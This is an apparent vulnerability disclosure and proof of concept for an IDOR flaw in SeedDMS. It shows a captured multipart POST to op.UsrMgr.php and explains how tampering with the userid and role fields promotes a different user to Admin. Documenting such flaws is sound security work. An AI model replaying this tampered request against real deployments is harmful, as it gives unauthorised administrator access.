A simple IDOR allows changing role of a different user by changing
userid
parameter androle
parameter.
Create two users namely sunil
and aman
on the endpoint: http://localhost/seeddms/out/out.UsrMgr.php
Check list of users at http://localhost/seeddms/out/out.UserList.php
In our case, userid
of aman
is 5
and userid
of sunil
is 6
. (This can be checked by hovering over or clicking the edit button (the userid appears in the url)
and edit the Role
to Guest
. (Change the userid parameter in the url as per your userid parameters)
Capture the request in BurpSuite as you click on the Save
Button.
You will get a request like this:
POST /seeddms/op/op.UsrMgr.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------113135331919090313053417803191
Content-Length: 1743
Origin: <http://localhost>
Connection: close
Referer: <http://localhost/seeddms/out/out.UsrMgr.php?userid=5>
Cookie: mydms_session=143fc0cdf34a682256baae37abda8ce2
Upgrade-Insecure-Requests: 1
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="formtoken"
519192f812db211d797f140b67255d03
**-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="userid"
5**
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="action"
edituser
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="login"
aman
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="pwd"
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="pwdconf"
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="pwdexpiration"
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="name"
Aman User
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="comment"
**-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="role"
2**
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="homefolder"
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="targetname13e65f6ab355d3a32705b2e99987d414"
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="quota"
0
-----------------------------113135331919090313053417803191--
Change the userid
from 5
to 6
and role
from 2
to 1
. This changes user from Aman to Sunil and the assigned role from Guest to Admin.
Now forward the request, and switch off the proxy.
You'll get an output like this in the web browser:
This shows that instead of Aman
(userid=5), the details of Sunil
(userid=6) has been updated and the role
of sunil
assigned is Admin
instead of Guest
.